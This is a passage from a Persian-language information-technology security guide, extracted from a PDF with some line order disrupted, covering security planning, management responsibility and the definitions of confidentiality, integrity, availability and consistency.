‫ﺍﺳﺖ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﻭﺟـﻮﺩ ﻣﻨـﺎﺑﻊ ﻣـﺎﻟﻲ ﻛـﺎﻓﻲ‬
‫ﺍﺳــﺘﺮﺍﺗﮋﻱ ﭘﻴــﺸﮕﻴﺮﻱ ﺭﺍ ﺩﺭ ﭘــﻴﺶ ﺑﮕﻴﺮﻳــﺪ؛ ﺍﻣــﺎ ﺍﮔــﺮ ﻫﺰﻳﻨــﺔ‬
‫ﭘﻴﺸﮕﻴﺮﻱ ﺑﻴﺶ ﺍﺯ ﻫﺰﻳﻨﺔ ﺁﺳﻴﺒﻬﺎ ﻭ ﺗﺮﻣﻴ ﹺﻢ ﺑﻌﺪ ﺍﺯ ﻭﻗـﻮﻉ ﺭﺧـﺪﺍﺩ‬
‫ﺍﺳﺖ‪ ،‬ﺗﺎ ﭘﻴﺶ ﺍﺯ ﻭﻗﻮﻉ ﺣﺎﺩﺛﻪ ﻫﻴﭻ ﺍﻗﺪﺍﻣﻲ ﻧﻜﻨﻴﺪ‪.‬‬
‫‪١٤٥‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﭘﻨﺞ ﻣﺮﺣﻠﺔ ﻣﺠﺰﺍ ﺗﻘﺴﻴﻢ ﻛﺮﺩ‪:‬‬
‫ﻓﺼﻞ ﭼﻬﺎﺭﻡ‬
‫ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺑﺮﺍﻱ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‬
‫‪.۱‬‬
‫‪.۲‬‬
‫‪.۳‬‬
‫‪.۴‬‬
‫‪.۵‬‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺩﻭ ﺍﺻﻞ ﺍﺳﺎﺳﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺩﺭ ﺑﺮﻧﺎﻣـﻪﺭﻳـﺰﻱ ﺍﺛـﺮﺑﺨﺶ‬
‫ﺳﻴﺎﺳﺖ ﻭ ﺍﻣﻨﻴﺖ ﺗﺄﺛﻴﺮ ﺿﻤﻨﻲ ﻣﻲﮔﺬﺍﺭﻧﺪ‪:‬‬
‫ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﭘﻴﺸﮕﻴﺮﻱ ﻭ ﺩﻓـﺎﻉ‬
‫ﻣﺆﺛﺮ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺗﻲ ﻛﻪ ﺩﺭ ﻓﺼﻞ ﻗﺒﻞ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﻬﺎ ﺑﺤـﺚ‬
‫ﺷﺪ ﻣﻲﭘﺮﺩﺍﺯﺩ ﻭ ﺟﺰﺋﻴﺎﺕ ﻓﺮﺁﻳﻨﺪ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺭﺍ ﺷﺮﺡ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺍﺳﺎﺳﹰﺎ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺭﺍﻩﺣﻠﻬـﺎﻱ ﻓﻨـﻲ ﺑـﺮﺍﻱ‬
‫ﻣــﺸﻜﻼﺕ ﻏﻴﺮﻓﻨــﻲ ﺍﺳــﺖ‪ .‬ﺯﻣــﺎﻥ‪ ،‬ﭘــﻮﻝ ﻭ ﺗــﻼﺵ ﺯﻳــﺎﺩﻱ ﺭﺍ‬
‫ﻣﻲﺗﻮﺍﻥ ﺑـﺮﺍﻱ ﺍﻳﻤـﻦ ﻛـﺮﺩﻥ ﺭﺍﻳﺎﻧـﻪ ﺻـﺮﻑ ﻛـﺮﺩ‪ ،‬ﺍﻣـﺎ ﻫﺮﮔـﺰ‬
‫ﻧﻤﻲﺗﻮﺍﻥ ﺍﺯ ﻧﮕﺮﺍﻧﻲ ﺩﺭ ﻣﻮﺭﺩ ﭘـﺎﻙﺷـﺪﻥ ﺗـﺼﺎﺩﻓﻲ ﺩﺍﺩﻩﻫـﺎ ﻳـﺎ‬
‫ﺗﺨﺮﻳﺐ ﻋﻤﺪﻱ ﺍﻃﻼﻋﺎﺕ ﺭﺍﺣﺖ ﺷﺪ‪ .‬ﺑﺎ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﻣﺠﻤﻮﻋﺔ‬
‫ﺷﺮﺍﻳﻂ ‪ -‬ﺍﺷﻜﺎﻻﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ‪ ،‬ﺣﻮﺍﺩﺙ‪ ،‬ﺍﺷـﺘﺒﺎﻫﺎﺕ‪ ،‬ﺑـﺪﺍﻗﺒﺎﻟﻲ‪،‬‬
‫ﺁﺏ ﻭ ﻫﻮﺍﻱ ﺑﺪ ﻳﺎ ﻳﻚ ﻣﻬﺎﺟﻢ ﻣﺠﻬﺰ ﻭ ﺑـﺎ ﺍﻧﮕﻴـﺰﻩ ‪ -‬ﻣـﺸﺎﻫﺪﻩ‬
‫ﻣﻲﺷﻮﺩ ﻛﻪ ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻣـﻮﺭﺩ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﻼ ﻣﻨﻬﺪﻡ ﺷﻮﺩ‪.‬‬
‫ﺑﮕﻴﺮﺩ‪ ،‬ﺍﺯ ﻓﻌﺎﻟﻴﺖ ﺑﻴﺎﻓﺘﺪ‪ ،‬ﻳﺎ ﺣﺘﻲ ﻛﺎﻣ ﹰ‬
‫ﻭﻇﻴﻔﺔ ﻣﺘﺨﺼﺼﻴﻦ ﺍﻣﻨﻴﺘﻲ ﻛﻤﻚ ﺑﻪ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﺗﺼﻤﻴﻢﮔﻴـﺮﻱ‬
‫ﺩﺭ ﻣﻮﺭﺩ ﺯﻣﺎﻥ ﻭ ﻫﺰﻳﻨﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﻣـﻲﺧﻮﺍﻫـﺪ ﺑـﺮﺍﻱ ﻣـﺴﺌﻠﻪ‬
‫ﺍﻣﻨﻴﺖ ﺍﺧﺘﺼﺎﺹ ﺩﻫﺪ‪ .‬ﺑﺨﺶ ﺩﻳﮕﺮ ﺍﻳﻨﻜﺎﺭ ﺣﺼﻮﻝ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ‬
‫ﻭﺟﻮﺩ ﺳﻴﺎﺳﺘﻬﺎ‪ ،‬ﺧﻂﻣﺸﻲﻫـﺎ ﻭ ﺭﻭﺍﻟﻬـﺎﻱ ﻣﻨﺎﺳـﺐ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ‬
‫ﺍﺳﺖ ﺗﺎ ﺑﻮﺩﺟﺔ ﺍﻣﻨﻴﺘﻲ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﻫﺰﻳﻨﻪ ﺷـﻮﺩ‪ .‬ﺩﺭ ﻧﻬﺎﻳـﺖ‬
‫ﺍﻓﺮﺍﺩ ﺣﺮﻓﻪﺍﻱ ﺑﺎﻳﺪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻨـﺪ ﺗـﺎ ﺍﺯ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ‬
‫ﺻﺤﻴﺢ ﻛﻨﺘﺮﻟﻬﺎﻱ ﻣﻨﺎﺳﺐ ﺩﺭ ﺭﺍﺳـﺘﺎﻱ ﺑـﺮﺁﻭﺭﺩﻩﺷـﺪﻥ ﺍﻫـﺪﺍﻑ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻨﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﻣﻨﻴﺖ ﻋﻤﻠﻲ ﺑﻴﺶ ﺍﺯ ﺍﻳﻨﻜـﻪ ﻣـﺴﺌﻠﻪﺍﻱ‬
‫ﻓﻨﻲ ﺑﺎﺷﺪ‪ ،‬ﻣﺴﺌﻠﻪﺍﻱ ﻣﺪﻳﺮﻳﺘﻲ ﺍﺳﺖ‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ﺍﻣﻨﻴﺖ ﺑﺎﻳﺪ ﻳﻜـﻲ‬
‫ﺍﺯ ﺍﻭﻟﻮﻳﺘﻬﺎﻱ ﻣﺪﻳﺮﻳﺖ ﺳﺎﺯﻣﺎﻥ ﺑﺎﺷﺪ‪ .‬ﺣﺘﻲ ﺩﺭ ﻣﺆﺳـﺴﺎﺕ ﺑـﺴﻴﺎﺭ‬
‫ﻛﻮﭼﻚ ﻛﻪ ﺑﻮﺩﺟﺔ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺻﺮﻑ ﻧﻤﻲﺷـﻮﺩ‪،‬‬
‫ﻣﺪﻳﺮﻳﺖ ﺑﺎﻳﺪ ﻣﺴﺎﺋﻞ ﺍﺻﻠﻲ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺩﺭﻙ ﻛﻨﺪ ﻭ ﺍﺻﻮﻝ ﺍﻭﻟﻴـﺔ‬
‫ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬﺎ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﺩ‪.‬‬
‫ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺁﮔﺎﻫﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻭ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺑﺎﻳﺪ ﺍﺯ ﺑـﺎﻻ ﺑـﻪ‬
‫ﭘﺎﺋﻴﻦ ﮔﺴﺘﺮﺵ ﻳﺎﺑـﺪ‪ .‬ﻧﮕﺮﺍﻧﻴﻬـﺎ ﻭ ﺁﮔـﺎﻫﻲ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﺯ ﻣـﺴﺎﺋﻞ‬
‫ﺍﻣﻨﻴﺘﻲ ﺣﺎﺋﺰ ﺍﻫﻤﻴـﺖ ﺍﺳـﺖ؛ ﺍﻣـﺎ ﺁﻧﻬـﺎ ﻧﻤـﻲﺗﻮﺍﻧﻨـﺪ ﺩﺭ ﮔـﺴﺘﺮﺓ‬
‫ﺳﺎﺯﻣﺎﻥ ﻳﻚ ﻓﺮﻫﻨﮓ ﻣﺆﺛﺮ ﺍﻣﻨﻴﺘﻲ ﺍﻳﺠﺎﺩ ﻭ ﺁﻧﺮﺍ ﺣﻔﻆ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺩﺭ‬
‫ﻋﻮﺽ ﺍﻳﻦ ﻣﺪﻳﺮﺍﻥ ﺳﺎﺯﻣﺎﻥ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺎﻳﺪ ﺑﻪ ﺍﻣﻨﻴـﺖ ﺑﻌﻨـﻮﺍﻥ‬
‫ﻣﻮﺿﻮﻋﻲ ﻣﻬﻢ ﺑﻨﮕﺮﻧﺪ ﻭ ﺿﻮﺍﺑﻂ ﻭ ﻣﻘﺮﺭﺍﺕ ﺁﻧﺮﺍ ﻧﻈﻴﺮ ﺳﺎﻳﺮ ﺍﻓﺮﺍﺩ‬
‫ﺑﭙﺬﻳﺮﻧﺪ ﻭ ﺍﺟﺮﺍ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﻣﺆﺛﺮ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﻣﻌﻨﺎﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﻣـﻲﺑﺎﺷـﺪ‪.‬‬
‫ﺍﮔﺮﭼﻪ ﺣﻔﺎﻇﺖ ﺍﺯ ﻣﻨﺎﺑﻊ ﺩﻳﮕﺮ ﻫـﻢ ﻣﻬـﻢ ﺍﺳـﺖ ﺍﻣـﺎ ﺿـﺮﺭﻫﺎﻱ‬
‫ﻧﺎﺷﻲ ﺍﺯ ﺗﺨﺮﻳﺐ ﺳﺎﻳﺮ ﻣﻨﺎﺑﻊ ﺑﺴﻴﺎﺭ ﺭﺍﺣﺖﺗﺮ ﺍﺯ ﺿـﺮﺭﻫﺎﻱ ﻭﺍﺭﺩﻩ‬
‫ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻗﺎﺑﻞ ﺗﺸﺨﻴﺺ ﻭ ﺟﺒـﺮﺍﻥ ﻫـﺴﺘﻨﺪ‪ .‬ﻛﻠﻴـﺔ ﻃﺮﺣﻬـﺎ‪،‬‬
‫ﺳﻴﺎﺳــﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬــﺎ ﺑﺎﻳــﺪ ﻣــﻨﻌﻜﺲﻛﻨﻨــﺪﺓ ﻧﻴــﺎﺯ ﺑــﻪ ﺣﻔﺎﻇــﺖ ﺍﺯ‬
‫ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻫﺮ ﻗﺎﻟﺐ ﻣﻤﻜﻦ ﺑﺎﺷﻨﺪ‪ .‬ﺍﻃﻼﻋﺎﺕ ﺍﻧﺤـﺼﺎﺭﻱ ﺍﮔـﺮ‬
‫ﺑﻪ ﭼﺎﭖ ﺑﺮﺳﻨﺪ ﻳﺎ ﺑﻪ ﻳﻚ ﺩﻓﺘﺮ ﻓﻜـﺲ ﺷـﻮﻧﺪ ﺍﺭﺯﺵ ﺧـﻮﺩ ﺭﺍ ﺍﺯ‬
‫ﺩﺳﺖ ﻧﻤﻲﺩﻫﻨﺪ‪ .‬ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﺔ ﻣﺸﺘﺮﻳﺎﻥ ﻧﻴـﺰ ﺍﮔـﺮ ﺑﺠـﺎﻱ‬
‫ﺍﺭﺳﺎﻝ ﺍﺯ ﻃﺮﻳﻖ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﻠﻔﻦ ﮔـﺰﺍﺭﺵ‬
‫ﺷﺪﻧﺪ ﻫﻤﭽﻨﺎﻥ ﺍﺯ ﺍﺭﺯﺵ ﺯﻳـﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭﻧـﺪ‪ .‬ﺧﻼﺻـﻪ ﺍﻳﻨﻜـﻪ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ‪ ،‬ﻣﺴﺘﻘﻞ ﺍﺯ ﺍﻳﻨﻜـﻪ ﺩﺭ‬
‫ﭼﻪ ﻗﺎﻟﺒﻲ ﺑﺎﺷﺪ‪.‬‬
‫ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻒ ﻭ ﺗﻌﺎﺭﻳﻒ ﻣﺘﻔﺎﻭﺗﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺠﺎﻱ ﺍﺭﺍﺋﻪ ﻳﻚ ﺗﻌﺮﻳﻒ ﺭﺳﻤﻲ‪ ،‬ﺗﻮﺟـﻪ ﺑﻴـﺸﺘﺮﻱ ﺑـﻪ‬
‫ﺭﻭﻳﻜﺮﺩ ﻋﻤﻠﻲ ﺩﺍﺭﺩ ﻭ ﺩﺭ ﻣﻮﺭﺩ ﺍﻧﻮﺍﻉ ﺣﻔﺎﻇﺘﻬﺎﻳﻲ ﻛﻪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ‬
‫ﻣﻼﺣﻈﻪ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﺑﻪ ﺑﺤﺚ ﭘﺮﺩﺍﺧﺘﻪ ﺍﺳﺖ‪.‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻭ ﺭﺍﻩﺣﻠﻬﺎﻱ ﻓﻨﻲ‬
‫ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﻣﻨﻴﺖ‬
‫ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺑﺮﺍﻱ ﺗﻌﻴﻴﻦ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻭ ﺍﻧﺘﺨﺎﺏ ﺑﻬﺘﺮﻳﻦ ﺷﻴﻮﻩﻫﺎ‬
‫ﺍﻳﺠﺎﺩ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺍﻧﻌﻜﺎﺱ ﻧﻴﺎﺯﻫﺎ‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﻣﻨﻴﺖ‬
‫ﺑﺮﺭﺳﻲ ﻭ ﻭﺍﻛﻨﺶ ﺑﻪ ﻭﻗﺎﻳﻊ‬
‫‪١٤٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺩﺳﺘﻪﺑﻨﺪﻱ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ‬
‫ﻛﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻧﺎﻣﻴﺪ‪.‬‬
‫ﺩﺭ ﺍﻳﻦ ﺗﻌﺮﻳﻒ ﮔﺴﺘﺮﺩﻩ‪ ،‬ﮔﻮﻧﻪﻫـﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺍﺯ ﺍﻣﻨﻴـﺖ ﻭﺟـﻮﺩ‬
‫‪٧١‬‬
‫ﺩﺍﺭﻧﺪ ﻛﻪ ﺭﺍﻫﺒﺮﺍﻥ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﺑﻪ ﺁﻧﻬﺎ ﺗﻮﺟﻪ ﻛﻨﻨﺪ‪:‬‬
‫ﻛﻨﺘﺮﻝ‬
‫ﻣﺤﺮﻣﺎﻧﮕﻲ‬
‫‪٧٢‬‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻘﺎﺑﻞ ﺧﻮﺍﻧﺪﻩﺷﺪﻥ ﻳـﺎ ﻧـﺴﺨﻪﺑـﺮﺩﺍﺭﻱ‬
‫ﺗﻮﺳـﻂ ﺍﺷﺨﺎﺻـﻲ ﻛـﻪ ﺍﺯ ﺟﺎﻧـﺐ ﻣﺎﻟـﻚ ﺁﻥ ﺍﻃﻼﻋـﺎﺕ ﻣﺠــﻮﺯ‬
‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻧﺮﺍ ﻧﺪﺍﺭﻧﺪ‪ .‬ﺍﻳﻦ ﮔﻮﻧﺔ ﺍﻣﻨﻴﺖ ﻧﻪﺗﻨﻬﺎ ﺣﻔﺎﻇﺖ ﻛﻠﻲ ﺍﺯ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺩﺭ ﺑﺮ ﻣﻲﮔﻴﺮﺩ‪ ،‬ﺑﻠﻜﻪ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺩﻩﻫـﺎﻱ ﻣﻨﻔـﺮﺩ‬
‫ﻱ ﺧﻮﺩ ﺁﺳﻴﺒﻲ ﺩﺭ ﭘـﻲ ﻧﺪﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‬
‫ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺧﻮﺩ ﹺ‬
‫ﻭﻟﻲ ﺍﺯ ﻃﺮﻳﻖ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺁﻧﻬﺎ ﺑﺘﻮﺍﻥ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧـﻪ ﭘـﻲ‬
‫ﺑﺮﺩ ﺭﺍ ﻧﻴﺰ ﺷﺎﻣﻞ ﻣﻲﺷﻮﺩ‪.‬‬
‫‪٧٣‬‬
‫ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ )ﺗﻤﺎﻣﻴﺖ(‬
‫ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ )ﻣﻨﺠﻤﻠﻪ ﺑﺮﻧﺎﻣﻪﻫﺎ( ﺩﺭ ﻣﻘﺎﺑﻞ ﻫﺮﮔﻮﻧﻪ ﺣﺬﻑ‬
‫ﻭ ﺗﻐﻴﻴﺮ ﺑﺪﻭﻥ ﺍﺟﺎﺯﺓ ﻣﺎﻟﻚ ﺁﻥ ﺍﻃﻼﻋـﺎﺕ‪ .‬ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ ﺑﺎﻳـﺪ‬
‫ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﮔﻴﺮﺩ ﺷﺎﻣﻞ ﺳﻮﺍﺑﻖ ﺣﺴﺎﺑﺪﺍﺭﻱ‪ ،‬ﻧﺴﺨﻪﻫﺎﻱ‬
‫ﭘﺸﺘﻴﺒﺎﻥ‪ ،‬ﺯﻣﺎﻧﻬﺎﻱ ﺍﻳﺠﺎﺩ ﻓﺎﻳﻞ ﻭ ﺍﺳﻨﺎﺩ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ‬
‫‪٧٤‬‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﺪﻣﺎﺗﻲ ﺑﮕﻮﻧـﻪﺍﻱ ﻛـﻪ ﺑـﺪﻭﻥ ﺗـﺼﺪﻳﻖ‬
‫ﺍﻋﺘﺒﺎﺭ ﺗﻨﺰﻝ ﭘﻴﺪﺍ ﻧﻜﻨﻨﺪ ﻭ ﺗﺨﺮﻳﺐ ﻧﺸﻮﻧﺪ‪ .‬ﺍﮔـﺮ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻳـﻚ‬
‫ﻛﺎﺭﺑ ﹺﺮ ﻣﺠﺎﺯ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻭ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﺩﺳﺘﺮﺱ‬
‫ﻧﺒﺎﺷﻨﺪ‪ ،‬ﻧﺘﻴﺠﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺯﻣﺎﻧﻲ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﺍﺯ ﺭﻭﻱ‬
‫ﺳﻴﺴﺘﻢ ﺣﺬﻑ ﺷﺪﻩﺍﻧﺪ ﻧﺎﺧﻮﺷﺎﻳﻨﺪ ﺑﺎﺷﺪ‪.‬‬
‫‪٧٥‬‬
‫ﺛﺒﺎﺕ ﻭ ﺳﺎﺯﮔﺎﺭﻱ )ﭘﺎﻳﺪﺍﺭﻱ(‬
‫ﺣﺼﻮﻝ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻢ ﺑﮕﻮﻧـﻪﺍﻱ ﻛـﻪ ﻣـﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺍﺳﺖ ﺭﻓﺘﺎﺭ ﻣﻲﻛﻨﺪ‪ .‬ﺍﮔﺮ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻳﺎ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻧﺎﮔﻬـﺎﻥ‬
‫ﺑﮕﻮﻧﻪﺍﻱ ﺑﺴﻴﺎﺭ ﻣﺘﻔﺎﻭﺕ ﺍﺯ ﻗﺒﻞ ﻋﻤﻞ ﻛﻨـﺪ ‪ -‬ﺧـﺼﻮﺻﹰﺎ ﺑﻌـﺪ ﺍﺯ‬
‫ﻳﻚ ﺍﺭﺗﻘﺎ ﻳﺎ ﺭﻓﻊ ﺍﺷﻜﺎﻝ ‪ -‬ﻣﺸﻜﻼﺕ ﺯﻳﺎﺩﻱ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺭﺥ‬
‫ﺩﻫﺪ‪ .‬ﺗﺼﻮﺭ ﻛﻨﻴﺪ ﺍﮔﺮ ﻓﺮﻣﺎﻥ "‪ "ls‬ﺑﻄـﻮﺭ ﺗـﺼﺎﺩﻓﻲ ﺣـﺬﻑ ﺷـﻮﺩ‬
‫ﻫﻨﮕﺎﻡ ﻓﻬﺮﺳﺖﮔﻴﺮﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﭼﻪ ﺍﺗﻔﺎﻗﻲ ﻣﻲﺍﻓﺘـﺪ! ﺍﻳـﻦ ﮔﻮﻧـﺔ‬
‫ﺍﻣﻨﻴﺖ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺻﺤﺖ ﺩﺍﺩﻩﻫـﺎ ﻭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻳﻲ‬
‫‪۷۱‬‬
‫ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ ﺭﻭﻳﻜﺮﺩ ‪ COBIT‬ﺩﺭ ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‪:‬‬
‫‪http://www.isaca.org/cobit.htm‬‬
‫‪Confidentiality‬‬
‫‪Integrity‬‬
‫‪Availability‬‬
‫‪Consistency‬‬
‫‪72‬‬
‫‪73‬‬
‫‪74‬‬
‫‪75‬‬
‫ﺿﺎﺑﻄﻪﻣﻨﺪ ﻛﺮﺩﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺳﻴﺴﺘﻢ‪ .‬ﺍﮔﺮ ﺍﻓﺮﺍﺩ )ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ(‬
‫ﻧﺎﺷـﻨﺎﺧﺘﻪ ﻭ ﻏﻴﺮﻣﺠـﺎﺯ ﺩﺭ ﺳﻴـﺴﺘﻢ ﺷــﻤﺎ ﻭﺟـﻮﺩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷــﻨﺪ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭﺩﺳﺮﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺑﻴﺎﻓﺮﻳﻨﻨﺪ ﻭ ﺷﻤﺎ ﺭﺍﺟﻊ ﺑﻪ ﭼﮕﻮﻧﮕﻲ‬
‫ﻭﺭﻭﺩ ﺁﻧﻬﺎ‪ ،‬ﺁﻧﭽﻪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺍﻧﺠـﺎﻡ ﺩﺍﺩﻩ ﺑﺎﺷـﻨﺪ‪ ،‬ﻭ ﺍﻓـﺮﺍﺩ‬
‫ﻻ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪﺍﻧﺪ ﺍﺣﺴﺎﺱ‬
‫ﺩﻳﮕﺮﻱ ﻛﻪ ﺍﺣﺘﻤﺎ ﹰ‬
‫ﻧﮕﺮﺍﻧﻲ ﻣﻲﻛﻨﻴﺪ‪ .‬ﺟﺒـﺮﺍﻥ ﭼﻨـﻴﻦ ﻣـﺸﻜﻼﺗﻲ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺴﻴﺎﺭ‬
‫ﻭﻗﺘﮕﻴﺮ ﻭ ﭘﺮﻫﺰﻳﻨﻪ ﺑﺎﺷﺪ‪ .‬ﺷﺎﻳﺪ ﻣﺠﺒﻮﺭ ﺷﻮﻳﺪ ﺳﻴـﺴﺘﻢ ﺧـﻮﺩ ﺭﺍ ﺍﺯ‬
